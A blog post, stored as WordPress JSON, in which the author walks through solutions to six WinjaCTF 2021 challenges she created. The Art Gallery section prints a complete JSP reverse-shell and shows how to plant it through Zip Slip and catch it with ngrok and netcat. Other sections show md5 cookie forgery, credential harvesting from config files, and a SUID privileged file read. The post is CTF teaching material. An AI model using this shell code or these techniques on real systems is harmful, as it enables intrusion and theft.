{"id":698,"date":"2021-03-12T08:32:26","date_gmt":"2021-03-12T08:32:26","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=698"},"modified":"2021-03-15T19:42:57","modified_gmt":"2021-03-15T19:42:57","slug":"winjactf-2021-solutions-2","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/winjactf-2021-solutions-2\/","title":{"rendered":"WinjaCtf 2021 solutions"},"content":{"rendered":"\n

Hey everyone! This blog post covers writeups of the challenges that were created by me as part of WinjaCTF 2021. WinjaCTF is an initiative by Nullcon and it organises CTF annually. Read about my experience at first nullcon here<\/span><\/strong><\/a><\/code><\/p>\n\n\n\n

The challenges created by me were : pieceofpie, junk, art gallery, find me, binarybits, Redeem me<\/strong>. I will be giving a detailed writeup for all these challenges. <\/p>\n\n\n\n

Let’s get started.<\/p>\n\n\n\n

Art Gallery<\/h2>\n\n\n\n

This challenge is based on a cve of tomcat ie named Zipslip<\/a><\/code>. Through this vulnerability, one can upload malicious zip files on the web server. And once the zip file gets uploaded, it get extracted and you get the capability to overwrite existing files.<\/p>\n\n\n\n

credits to be given to hackthebox for this amazing challenge idea!<\/p><\/blockquote>\n\n\n\n

Solution<\/h3>\n\n\n\n

The initial landing page looks like this. It has both the options: to upload image and to upload a zip file containing image bundle.<\/p>\n\n\n\n

But how will you identify the tomcat server? Simple \ud83d\ude42 Run nmap for that host.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The task is to upload a malicious zip file. Use the tool evilarc<\/span><\/span><\/a> to create malicious zip files. <\/p>\n\n\n\n

python evilarc.py -o unix -p usr\/local\/tomcat\/webapps\/ROOT\/ shell.jsp<\/pre>\n\n\n\n
The file shell.jsp<\/p>\n\n\n\n
<%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n    InputStream is;\n    OutputStream os;\n    StreamConnector(InputStream is, OutputStream os) {\n        this.is = is;\n        this.os = os;\n    }\n    public void run() {\n        BufferedReader isr = null;\n        BufferedWriter osw = null;\n        try {\n            isr = new BufferedReader(new InputStreamReader(is));\n            osw = new BufferedWriter(new OutputStreamWriter(os));\n            char buffer[] = new char[8192];\n            int lenRead;\n            while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n                osw.write(buffer, 0, lenRead);\n                osw.flush();\n            }\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n        try {\n            if (isr != null)\n                isr.close();\n            if (osw != null)\n                osw.close();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n}\n%>\n\n<h1>JSP Reverse Shell<\/h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process<\/p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"\/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"\/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"\/>\n<\/form>\n\n<%\n    String ipAddress = request.getParameter(\"ipaddress\");\n    String ipPort = request.getParameter(\"port\");\n    Socket sock = null;\n    Process proc = null;\n    if (ipAddress != null && ipPort != null) {\n        try {\n            sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n            System.out.println(\"socket created: \" + sock.toString());\n            Runtime rt = Runtime.getRuntime();\n            proc = rt.exec(\"\/bin\/bash\");\n            System.out.println(\"process \/bin\/bash started: \" + proc.toString());\n            StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n            System.out.println(\"outputConnector created: \" + outputConnector.toString());\n            StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n            System.out.println(\"inputConnector created: \" + inputConnector.toString());\n            outputConnector.start();\n            inputConnector.start();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n    if (sock != null && proc != null) {\n        out.println(\"<div class='separator'><\/div>\");\n        out.println(\"<p>Process \/bin\/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".<\/p>\");\n    }\n%>\n<\/code><\/pre>\n\n\n\n
It will create evil.zip with contents ..\/..\/..\/..\/..\/..\/..\/..\/usr\/local\/tomcat\/webapps\/ROOT\/shell.jsp. When this zip file is extracted, the shell.jsp will be placed inside the webapp’s ROOT folder.<\/p>\n\n\n\n
PS: do not put the leading \/ while giving arguments for -p <\/p><\/blockquote>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Now run ngrok and nc on two different terminals.<\/p>\n\n\n\n
ngrok tcp 9001<\/pre>\n\n\n\n
nc -lnvp 9001<\/pre>\n\n\n\n
For ngrok, you will receive the follwoing output.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
With the help of ngrok, the local port 9001 gets mapped to a public dns tcp:\/\/2.tcp.ngrok.io:19107 Cool Right?<\/p>\n\n\n\n
Open up your shell.jsp that just got extracted and enter the ngrok’s address and port.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
On clicking connect, you will get the connection on your nc listener.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Got the flag, but the file says that that the task isnt over yet! That means we need to enumerate further. <\/p>\n\n\n\n
Under \/home<\/strong> we can find that user cat <\/strong>is present. Something interesting might be present there. But we dont know the password for cat. Remember? that the whole box was around tomcat and tomcat-users.xml<\/strong> is the file that contains usernames and passwords. You will find one for user cat ie Winja@123 <\/strong><\/p>\n\n\n\n
Just login there and your next challenge junk will start!<\/p>\n\n\n\n
Junk<\/h2>\n\n\n\n
Login as user cat. You will find junk folder. Junk folder contains 1000 files which have base64 encoded gibberish text. The text inside files is base64 encoded random number of times. And only one file has the flag.<\/p>\n\n\n\n
Solution<\/h2>\n\n\n\n
You can write a simple bash script to loop through every file in the folder and base64 decode it the number of times till it gives invalid input.<\/p>\n\n\n\n
#!\/bin\/bash\nfor filename in dump1\/*; do\n    x=`echo $(cat $filename)`\n    \n    for ((i=1; i<=9; i++)); do\n\t    x=`echo $x | base64 -d`\n            echo $x  \t    \n\t    if (echo $x | grep flag)\n\t\tthen\n\t\t\t    echo $x\n\t\t\t    break\n\t        fi\n\t    \t\t\n    done\ndone\n<\/code><\/pre>\n\n\n\n
The script will base64 decode every file for 9 times. <\/p>\n\n\n\n
So save the output of the terminal, you can directly pipe it to file.<\/p>\n\n\n\n
bash soln.sh > out<\/pre>\n\n\n\n
In the file out, search for the text “flag”, as it is the required flag format.<\/p>\n\n\n\n
PieceofPie<\/h2>\n\n\n\n
Pieceofpie is a web challenge that exploits predictable cookies. The challenge initially displays a page of restaurant named Cibo. It has a login and a registration page.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Solution<\/h3>\n\n\n\n
When registering the new user, you will find that the user administrator exists, as you wont be able to create a username with that.<\/p>\n\n\n\n
So just simply make a normal user test123<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Now after login, you will get the index page.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The task is to become the master user!! As we already know that there is an administrator user, something might be done around it.<\/p>\n\n\n\n
Now, right click and do inspect element. Under applications, click on the cookies section. <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
If you closely look at the ssid, you will realize that it is md5 hash. Try decoding the same and you will get test123 (that is the username you just logged in with) . That means you need to create md5 hash corresponding to the administrator user. <\/p>\n\n\n\n
Once the new hash is loaded, you become administrator and you get the flag!<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Find me<\/h2>\n\n\n\n
Find me is an OSINT based challenge. The username ramlalkulkarni<\/strong> has been leaked in the Mr. covid doctor <\/strong>challenge, under http:\/\/url\/humans.txt<\/p>\n\n\n\n
The reference to the username is given in the whole ctf scenerio.<\/p>\n\n\n\n
Solution<\/h3>\n\n\n\n
Once you get the username, the only thing that comes to mind is Sherlock<\/strong>.<\/p>\n\n\n\n
Sherlock is an OSINT tool that enumerates the social media websites which hold the account with given username. You can find the github link here:<\/p>\n\n\n\n
https:\/\/github.com\/sherlock-project\/sherlock<\/a><\/p>\n\n\n\n
Git clone the repo. pip install all the python modules dependency. Now, simply run<\/p>\n\n\n\n
python3 sherlock.py ramlalkulkarni<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Got a bunch of valid results, but only one corresponds to our ctf and that is trello. Visit https:\/\/trello.com\/ramlalkulkarni<\/strong> and you will see his public  trello board. You will see a board that is pretty much similar to the flag, but its not the flag<\/p>\n\n\n\n
PS: the trello board has now been made private.<\/p><\/blockquote>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Looks like its some sort of substitution cipher. The hint a+b=6 implies that there is some value for a and b that makes the sum 6. From a and b it is clearly identifiable that its affine cipher<\/strong>. <\/p>\n\n\n\n
The value of a and b can be bruteforced. And it comes out to be a = b = 3<\/strong><\/p>\n\n\n\n
You can go to cyberchef<\/span><\/code><\/a><\/strong> and do a affine cipher decode to get your flag.<\/p>\n\n\n\n
Redeem Me<\/h2>\n\n\n\n
This challenge is based on image stegnography. In the secretive flights challenge, you will find an image that contains some voucher codes to redeem.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Solution<\/h3>\n\n\n\n
Download the image and run exiftool on it.<\/p>\n\n\n\n
exiftool file.png<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The comment says: paste this code. But the question is paste where?<\/p>\n\n\n\n
Paste is the hint for Pastebin as the code will build up a Pastebin URL. https:\/\/pastebin.com\/C7DSpwhi<\/strong> . You will see a password protected paste. The password for the paste is the code written on the voucher (all in small caps) ie fwxldbrbfh<\/strong>. And you will get your flag!!<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Binary Bits<\/h2>\n\n\n\n
Binary Bits is a challenge based on privilege escalation. The challenge description says that to move forward, you need to have the creds. The creds to move forward can be found once you solve bank challenge<\/strong> or e-mobi<\/strong>. <\/p>\n\n\n\n
The creds are admin:My$up3rS3cr3tPassword!<\/strong><\/p>\n\n\n\n
With nmap you can identify that ssh service is runing on the port. So just simply ssh on the given port.<\/p>\n\n\n\n
ssh -p 49172 admin@challenges.winja.site <\/pre>\n\n\n\n
Now there are a list of users present. But you wont be able to view content of other users.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
When you have the shell, the first thing to do is enumerate the machine for juicy information. Grab linpeas.sh<\/strong> or linenum.sh<\/strong> from github and run script on the box. There you will find that suid bit is set on sort binary.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
This is something unusual from the default suids. There is a project named gtfobins<\/span><\/code><\/strong><\/a> that contains a database for all the binaries through which you can elevate your privileges. When suid bit is set on sort, you can do a privileged read on the files on which read permission is denied. That’s cool, right? But you need some additional information in order to get the flag as the file name containing the flag has been changed.<\/p>\n\n\n\n
In the enumeration results, you will find a file named myhash in \/opt<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The hash seems like md5. You can use any online md5 decoder to decode the hash to beautiful1<\/strong>. Now as you have the password, try it on all the accounts and for charlie, it will work.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Now you will get 2 important pieces with ploy.txt. Username is dragon and file name has to be guessed to treasure.txt. Run the command<\/p>\n\n\n\n
sort -m \/home\/dragon\/treasure.txt<\/pre>\n\n\n\n
And you get the flag!<\/p>\n\n\n\n
That’s all for this blog post! I hope you enjoyed solving Winjactf challenges. Let me know in the comment section, what you think about the challenges that I created. Feel free if you have any kind of feedback or suggestions. Thanks.<\/p>\n\n\n\n
Note:<\/span> Please do not create any writeups by copying things from here. It won’t make you eligible for the blog writing rewards by winja.<\/p><\/blockquote>\n\n\n\n
See you in the next one! Until then happy hunting \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"
Hey everyone! This blog post covers writeups of the challenges that were created by me as part of WinjaCTF 2021. WinjaCTF is an initiative by Nullcon and it organises CTF annually. Read about my experience at first nullcon here The challenges created by me were : pieceofpie, junk, art gallery, find me, binarybits, Redeem me. […]<\/p>\n","protected":false},"author":1,"featured_media":651,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[280,2,1],"tags":[296,243,287,284,286,285,281,282],"class_list":["post-698","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-information-security","category-uncategorized","tag-ctf","tag-nullcon","tag-osint","tag-stegnography","tag-system-administration","tag-web","tag-winja","tag-winjactf2021","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/698"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=698"}],"version-history":[{"count":4,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/698\/revisions"}],"predecessor-version":[{"id":721,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/698\/revisions\/721"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/651"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=698"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=698"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=698"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}